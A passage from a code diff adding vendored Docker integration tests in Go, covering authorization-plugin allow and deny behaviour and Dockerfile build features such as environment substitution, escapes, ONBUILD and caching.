+	mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		body, err := ioutil.ReadAll(r.Body)
+		c.Assert(err, check.IsNil)
+		authReq := authorization.Request{}
+		err = json.Unmarshal(body, &authReq)
+		c.Assert(err, check.IsNil)
+
+		assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody)
+		assertAuthHeaders(c, authReq.RequestHeaders)
+
+		// Count only container list api
+		if strings.HasSuffix(authReq.RequestURI, containerListAPI) {
+			s.ctrl.psRequestCnt++
+		}
+
+		s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI)
+
+		reqRes := s.ctrl.reqRes
+		if isAllowed(authReq.RequestURI) {
+			reqRes = authorization.Response{Allow: true}
+		}
+		if reqRes.Err != "" {
+			w.WriteHeader(http.StatusInternalServerError)
+		}
+		b, err := json.Marshal(reqRes)
+		c.Assert(err, check.IsNil)
+		s.ctrl.reqUser = authReq.User
+		w.Write(b)
+	})
+
+	mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		body, err := ioutil.ReadAll(r.Body)
+		c.Assert(err, check.IsNil)
+		authReq := authorization.Request{}
+		err = json.Unmarshal(body, &authReq)
+		c.Assert(err, check.IsNil)
+
+		assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody)
+		assertAuthHeaders(c, authReq.ResponseHeaders)
+
+		// Count only container list api
+		if strings.HasSuffix(authReq.RequestURI, containerListAPI) {
+			s.ctrl.psResponseCnt++
+		}
+		resRes := s.ctrl.resRes
+		if isAllowed(authReq.RequestURI) {
+			resRes = authorization.Response{Allow: true}
+		}
+		if resRes.Err != "" {
+			w.WriteHeader(http.StatusInternalServerError)
+		}
+		b, err := json.Marshal(resRes)
+		c.Assert(err, check.IsNil)
+		s.ctrl.resUser = authReq.User
+		w.Write(b)
+	})
+
+	err := os.MkdirAll("/etc/docker/plugins", 0755)
+	c.Assert(err, checker.IsNil)
+
+	fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin)
+	err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644)
+	c.Assert(err, checker.IsNil)
+}
+
+// check for always allowed endpoints to not inhibit test framework functions
+func isAllowed(reqURI string) bool {
+	for _, endpoint := range alwaysAllowed {
+		if strings.HasSuffix(reqURI, endpoint) {
+			return true
+		}
+	}
+	return false
+}
+
+// assertAuthHeaders validates authentication headers are removed
+func assertAuthHeaders(c *check.C, headers map[string]string) error {
+	for k := range headers {
+		if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") {
+			c.Errorf("Found authentication headers in request '%v'", headers)
+		}
+	}
+	return nil
+}
+
+// assertBody asserts that body is removed for non text/json requests
+func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) {
+	if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 {
+		//return fmt.Errorf("Body included for authentication endpoint %s", string(body))
+		c.Errorf("Body included for authentication endpoint %s", string(body))
+	}
+
+	for k, v := range headers {
+		if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" {
+			return
+		}
+	}
+	if len(body) > 0 {
+		c.Errorf("Body included while it should not (Headers: '%v')", headers)
+	}
+}
+
+func (s *DockerAuthzSuite) TearDownSuite(c *check.C) {
+	if s.server == nil {
+		return
+	}
+
+	s.server.Close()
+
+	err := os.RemoveAll("/etc/docker/plugins")
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) {
+	// start the daemon and load busybox, --net=none build fails otherwise
+	// cause it needs to pull busybox
+	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+	c.Assert(s.d.LoadBusybox(), check.IsNil)
+
+	// Ensure command successful
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil)
+
+	id := strings.TrimSpace(out)
+	assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create")
+	assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id))
+
+	out, err = s.d.Cmd("ps")
+	c.Assert(err, check.IsNil)
+	c.Assert(assertContainerList(out, []string{id}), check.Equals, true)
+	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
+	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) {
+
+	const testDaemonHTTPSAddr = "tcp://localhost:4271"
+	// start the daemon and load busybox, --net=none build fails otherwise
+	// cause it needs to pull busybox
+	if err := s.d.Start(
+		"--authorization-plugin="+testAuthZPlugin,
+		"--tlsverify",
+		"--tlscacert",
+		"fixtures/https/ca.pem",
+		"--tlscert",
+		"fixtures/https/server-cert.pem",
+		"--tlskey",
+		"fixtures/https/server-key.pem",
+		"-H", testDaemonHTTPSAddr); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+
+	out, _ := dockerCmd(
+		c,
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-cert.pem",
+		"--tlskey", "fixtures/https/client-key.pem",
+		"-H",
+		testDaemonHTTPSAddr,
+		"version",
+	)
+	if !strings.Contains(out, "Server") {
+		c.Fatalf("docker version should return information of server side")
+	}
+
+	c.Assert(s.ctrl.reqUser, check.Equals, "client")
+	c.Assert(s.ctrl.resUser, check.Equals, "client")
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) {
+	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
+	c.Assert(err, check.IsNil)
+	s.ctrl.reqRes.Allow = false
+	s.ctrl.reqRes.Msg = unauthorizedMessage
+
+	// Ensure command is blocked
+	res, err := s.d.Cmd("ps")
+	c.Assert(err, check.NotNil)
+	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
+	c.Assert(s.ctrl.psResponseCnt, check.Equals, 0)
+
+	// Ensure unauthorized message appears in response
+	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage))
+}
+
+// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden
+func (s *DockerAuthzSuite) TestAuthZPluginAPIDenyResponse(c *check.C) {
+	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
+	c.Assert(err, check.IsNil)
+	s.ctrl.reqRes.Allow = false
+	s.ctrl.resRes.Msg = unauthorizedMessage
+
+	daemonURL, err := url.Parse(s.d.sock())
+
+	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
+	c.Assert(err, check.IsNil)
+	client := httputil.NewClientConn(conn, nil)
+	req, err := http.NewRequest("GET", "/version", nil)
+	c.Assert(err, check.IsNil)
+	resp, err := client.Do(req)
+
+	c.Assert(err, check.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden)
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) {
+	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
+	c.Assert(err, check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = false
+	s.ctrl.resRes.Msg = unauthorizedMessage
+
+	// Ensure command is blocked
+	res, err := s.d.Cmd("ps")
+	c.Assert(err, check.NotNil)
+	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
+	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
+
+	// Ensure unauthorized message appears in response
+	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage))
+}
+
+// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin
+func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// start the daemon and load busybox to avoid pulling busybox from Docker Hub
+	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+	c.Assert(s.d.LoadBusybox(), check.IsNil)
+
+	startTime := strconv.FormatInt(daemonTime(c).Unix(), 10)
+	// Add another command to to enable event pipelining
+	eventsCmd := exec.Command(dockerBinary, "--host", s.d.sock(), "events", "--since", startTime)
+	stdout, err := eventsCmd.StdoutPipe()
+	if err != nil {
+		c.Assert(err, check.IsNil)
+	}
+
+	observer := eventObserver{
+		buffer:    new(bytes.Buffer),
+		command:   eventsCmd,
+		scanner:   bufio.NewScanner(stdout),
+		startTime: startTime,
+	}
+
+	err = observer.Start()
+	c.Assert(err, checker.IsNil)
+	defer observer.Stop()
+
+	// Create a container and wait for the creation events
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	containerID := strings.TrimSpace(out)
+	c.Assert(s.d.waitRun(containerID), checker.IsNil)
+
+	events := map[string]chan bool{
+		"create": make(chan bool, 1),
+		"start":  make(chan bool, 1),
+	}
+
+	matcher := matchEventLine(containerID, "container", events)
+	processor := processEventMatch(events)
+	go observer.Match(matcher, processor)
+
+	// Ensure all events are received
+	for event, eventChannel := range events {
+
+		select {
+		case <-time.After(30 * time.Second):
+			// Fail the test
+			observer.CheckEventError(c, containerID, event, matcher)
+			c.FailNow()
+		case <-eventChannel:
+			// Ignore, event received
+		}
+	}
+
+	// Ensure both events and container endpoints are passed to the authorization plugin
+	assertURIRecorded(c, s.ctrl.requestsURIs, "/events")
+	assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create")
+	assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID))
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) {
+	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
+	c.Assert(err, check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Err = errorMessage
+
+	// Ensure command is blocked
+	res, err := s.d.Cmd("ps")
+	c.Assert(err, check.NotNil)
+
+	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage))
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginErrorRequest(c *check.C) {
+	err := s.d.Start("--authorization-plugin=" + testAuthZPlugin)
+	c.Assert(err, check.IsNil)
+	s.ctrl.reqRes.Err = errorMessage
+
+	// Ensure command is blocked
+	res, err := s.d.Cmd("ps")
+	c.Assert(err, check.NotNil)
+
+	c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage))
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) {
+	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil)
+
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+
+	out, err := s.d.Cmd("ps")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// assert plugin is only called once..
+	c.Assert(s.ctrl.psRequestCnt, check.Equals, 1)
+	c.Assert(s.ctrl.psResponseCnt, check.Equals, 1)
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) {
+	c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+	c.Assert(s.d.LoadBusybox(), check.IsNil)
+
+	tmp, err := ioutil.TempDir("", "test-authz-load-import")
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmp)
+
+	savedImagePath := filepath.Join(tmp, "save.tar")
+
+	out, err := s.d.Cmd("save", "-o", savedImagePath, "busybox")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("load", "--input", savedImagePath)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	exportedImagePath := filepath.Join(tmp, "export.tar")
+
+	out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("import", exportedImagePath)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) {
+	c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil)
+	s.ctrl.reqRes.Allow = true
+	s.ctrl.resRes.Allow = true
+	c.Assert(s.d.LoadBusybox(), check.IsNil)
+
+	daemonURL, err := url.Parse(s.d.sock())
+
+	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
+	c.Assert(err, check.IsNil)
+	client := httputil.NewClientConn(conn, nil)
+	req, err := http.NewRequest("GET", "/version", nil)
+	c.Assert(err, check.IsNil)
+	resp, err := client.Do(req)
+
+	c.Assert(err, check.IsNil)
+	c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json")
+}
+
+// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin
+func assertURIRecorded(c *check.C, uris []string, uri string) {
+	var found bool
+	for _, u := range uris {
+		if strings.Contains(u, uri) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ","))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
new file mode 100644
index 0000000000..49c1062c25
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
@@ -0,0 +1,7392 @@
+package main
+
+import (
+	"archive/tar"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"reflect"
+	"regexp"
+	"runtime"
+	"strconv"
+	"strings"
+	"text/template"
+	"time"
+
+	"github.com/docker/docker/builder/dockerfile/command"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) {
+	name := "testbuildjsonemptyrun"
+
+	_, err := buildImage(
+		name,
+		`
+    FROM busybox
+    RUN []
+    `,
+		true)
+
+	if err != nil {
+		c.Fatal("error when dealing with a RUN statement with empty JSON array")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) {
+	name := "testbuildshcmdjsonentrypoint"
+
+	_, err := buildImage(
+		name,
+		`
+    FROM busybox
+    ENTRYPOINT ["echo"]
+    CMD echo test
+    `,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--rm", name)
+
+	if daemonPlatform == "windows" {
+		if !strings.Contains(out, "cmd /S /C echo test") {
+			c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out)
+		}
+	} else {
+		if strings.TrimSpace(out) != "/bin/sh -c echo test" {
+			c.Fatalf("CMD did not contain /bin/sh -c : %q", out)
+		}
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) {
+	// Windows does not support FROM scratch or the USER command
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvironmentreplacement"
+
+	_, err := buildImage(name, `
+  FROM scratch
+  ENV user foo
+  USER ${user}
+  `, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.User")
+
+	if res != `"foo"` {
+		c.Fatal("User foo from environment not in Config.User on image")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) {
+	name := "testbuildenvironmentreplacement"
+
+	var volumePath string
+
+	if daemonPlatform == "windows" {
+		volumePath = "c:/quux"
+	} else {
+		volumePath = "/quux"
+	}
+
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  ENV volume `+volumePath+`
+  VOLUME ${volume}
+  `, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Volumes")
+
+	var volumes map[string]interface{}
+
+	if err := json.Unmarshal([]byte(res), &volumes); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := volumes[volumePath]; !ok {
+		c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes on image")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) {
+	// Windows does not support FROM scratch or the EXPOSE command
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvironmentreplacement"
+
+	_, err := buildImage(name, `
+  FROM scratch
+  ENV port 80
+  EXPOSE ${port}
+  ENV ports "  99   100 "
+  EXPOSE ${ports}
+  `, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.ExposedPorts")
+
+	var exposedPorts map[string]interface{}
+
+	if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil {
+		c.Fatal(err)
+	}
+
+	exp := []int{80, 99, 100}
+
+	for _, p := range exp {
+		tmp := fmt.Sprintf("%d/tcp", p)
+		if _, ok := exposedPorts[tmp]; !ok {
+			c.Fatalf("Exposed port %d from environment not in Config.ExposedPorts on image", p)
+		}
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) {
+	name := "testbuildenvironmentreplacement"
+
+	_, err := buildImage(name, `
+  FROM busybox
+  ENV MYWORKDIR /work
+  RUN mkdir ${MYWORKDIR}
+  WORKDIR ${MYWORKDIR}
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) {
+	name := "testbuildenvironmentreplacement"
+
+	ctx, err := fakeContext(`
+  FROM `+minimalBaseImage()+`
+  ENV baz foo
+  ENV quux bar
+  ENV dot .
+  ENV fee fff
+  ENV gee ggg
+
+  ADD ${baz} ${dot}
+  COPY ${quux} ${dot}
+  ADD ${zzz:-${fee}} ${dot}
+  COPY ${zzz:-${gee}} ${dot}
+  `,
+		map[string]string{
+			"foo": "test1",
+			"bar": "test2",
+			"fff": "test3",
+			"ggg": "test4",
+		})
+
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) {
+	// ENV expansions work differently in Windows
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvironmentreplacement"
+
+	_, err := buildImage(name,
+		`
+  FROM busybox
+  ENV foo zzz
+  ENV bar ${foo}
+  ENV abc1='$foo'
+  ENV env1=$foo env2=${foo} env3="$foo" env4="${foo}"
+  RUN [ "$abc1" = '$foo' ] && (echo "$abc1" | grep -q foo)
+  ENV abc2="\$foo"
+  RUN [ "$abc2" = '$foo' ] && (echo "$abc2" | grep -q foo)
+  ENV abc3 '$foo'
+  RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo)
+  ENV abc4 "\$foo"
+  RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo)
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Env")
+
+	envResult := []string{}
+
+	if err = json.Unmarshal([]byte(res), &envResult); err != nil {
+		c.Fatal(err)
+	}
+
+	found := false
+	envCount := 0
+
+	for _, env := range envResult {
+		parts := strings.SplitN(env, "=", 2)
+		if parts[0] == "bar" {
+			found = true
+			if parts[1] != "zzz" {
+				c.Fatalf("Could not find replaced var for env `bar`: got %q instead of `zzz`", parts[1])
+			}
+		} else if strings.HasPrefix(parts[0], "env") {
+			envCount++
+			if parts[1] != "zzz" {
+				c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1])
+			}
+		} else if strings.HasPrefix(parts[0], "env") {
+			envCount++
+			if parts[1] != "foo" {
+				c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1])
+			}
+		}
+	}
+
+	if !found {
+		c.Fatal("Never found the `bar` env variable")
+	}
+
+	if envCount != 4 {
+		c.Fatalf("Didn't find all env vars - only saw %d\n%s", envCount, envResult)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) {
+	// The volume paths used in this test are invalid on Windows
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildhandleescapes"
+
+	_, err := buildImage(name,
+		`
+  FROM scratch
+  ENV FOO bar
+  VOLUME ${FOO}
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	var result map[string]map[string]struct{}
+
+	res := inspectFieldJSON(c, name, "Config.Volumes")
+
+	if err = json.Unmarshal([]byte(res), &result); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := result["bar"]; !ok {
+		c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result)
+	}
+
+	deleteImages(name)
+
+	_, err = buildImage(name,
+		`
+  FROM scratch
+  ENV FOO bar
+  VOLUME \${FOO}
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res = inspectFieldJSON(c, name, "Config.Volumes")
+
+	if err = json.Unmarshal([]byte(res), &result); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := result["${FOO}"]; !ok {
+		c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result)
+	}
+
+	deleteImages(name)
+
+	// this test in particular provides *7* backslashes and expects 6 to come back.
+	// Like above, the first escape is swallowed and the rest are treated as
+	// literals, this one is just less obvious because of all the character noise.
+
+	_, err = buildImage(name,
+		`
+  FROM scratch
+  ENV FOO bar
+  VOLUME \\\\\\\${FOO}
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	res = inspectFieldJSON(c, name, "Config.Volumes")
+
+	if err = json.Unmarshal([]byte(res), &result); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := result[`\\\${FOO}`]; !ok {
+		c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) {
+	name := "testbuildonbuildlowercase"
+	name2 := "testbuildonbuildlowercase2"
+
+	_, err := buildImage(name,
+		`
+  FROM busybox
+  onbuild run echo quux
+  `, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	_, out, err := buildImageWithOut(name2, fmt.Sprintf(`
+  FROM %s
+  `, name), true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if !strings.Contains(out, "quux") {
+		c.Fatalf("Did not receive the expected echo text, got %s", out)
+	}
+
+	if strings.Contains(out, "ONBUILD ONBUILD") {
+		c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) {
+	// ENV expansions work differently in Windows
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvescapes"
+	_, err := buildImage(name,
+		`
+    FROM busybox
+    ENV TEST foo
+    CMD echo \$
+    `,
+		true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "-t", name)
+
+	if strings.TrimSpace(out) != "$" {
+		c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out))
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) {
+	// ENV expansions work differently in Windows
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvoverwrite"
+
+	_, err := buildImage(name,
+		`
+    FROM busybox
+    ENV TEST foo
+    CMD echo ${TEST}
+    `,
+		true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name)
+
+	if strings.TrimSpace(out) != "bar" {
+		c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out))
+	}
+
+}
+
+func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) {
+	name1 := "onbuildcmd"
+	name2 := "onbuildgenerated"
+
+	_, err := buildImage(name1, `
+FROM busybox
+ONBUILD CMD ["hello world"]
+ONBUILD ENTRYPOINT ["echo"]
+ONBUILD RUN ["true"]`,
+		false)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	_, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", name2)
+
+	if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) {
+		c.Fatalf("did not get echo output from onbuild. Got: %q", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) {
+	name1 := "onbuildcmd"
+	name2 := "onbuildgenerated"
+
+	_, err := buildImage(name1, `
+FROM busybox
+ONBUILD ENTRYPOINT ["echo"]`,
+		false)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	_, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1), false)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", name2)
+
+	if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) {
+		c.Fatal("got malformed output from onbuild", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildCacheAdd(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet
+	name := "testbuildtwoimageswithadd"
+	server, err := fakeStorage(map[string]string{
+		"robots.txt": "hello",
+		"index.html": "world",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	if _, err := buildImage(name,
+		fmt.Sprintf(`FROM scratch
+		ADD %s/robots.txt /`, server.URL()),
+		true); err != nil {
+		c.Fatal(err)
+	}
+	if err != nil {
+		c.Fatal(err)
+	}
+	deleteImages(name)
+	_, out, err := buildImageWithOut(name,
+		fmt.Sprintf(`FROM scratch
+		ADD %s/index.html /`, server.URL()),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.Contains(out, "Using cache") {
+		c.Fatal("2nd build used cache on ADD, it shouldn't")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildLastModified(c *check.C) {
+	name := "testbuildlastmodified"
+
+	server, err := fakeStorage(map[string]string{
+		"file": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	var out, out2 string
+
+	dFmt := `FROM busybox
+ADD %s/file /`
+
+	dockerfile := fmt.Sprintf(dFmt, server.URL())
+
+	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+
+	// Build it again and make sure the mtime of the file didn't change.
+	// Wait a few seconds to make sure the time changed enough to notice
+	time.Sleep(2 * time.Second)
+
+	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
+		c.Fatal(err)
+	}
+	out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+
+	if out != out2 {
+		c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2)
+	}
+
+	// Now 'touch' the file and make sure the timestamp DID change this time
+	// Create a new fakeStorage instead of just using Add() to help windows
+	server, err = fakeStorage(map[string]string{
+		"file": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	dockerfile = fmt.Sprintf(dFmt, server.URL())
+
+	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
+		c.Fatal(err)
+	}
+	out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+
+	if out == out2 {
+		c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2)
+	}
+
+}
+
+// Regression for https://github.com/docker/docker/pull/27805
+// Makes sure that we don't use the cache if the contents of
+// a file in a subfolder of the context is modified and we re-build.
+func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) {
+	name := "testbuildmodifyfileinfolder"
+
+	ctx, err := fakeContext(`FROM busybox
+RUN ["mkdir", "/test"]
+ADD folder/file /test/changetarget`,
+		map[string]string{})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if err := ctx.Add("folder/file", "first"); err != nil {
+		c.Fatal(err)
+	}
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if err := ctx.Add("folder/file", "second"); err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("cache was used even though file contents in folder was changed")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) {
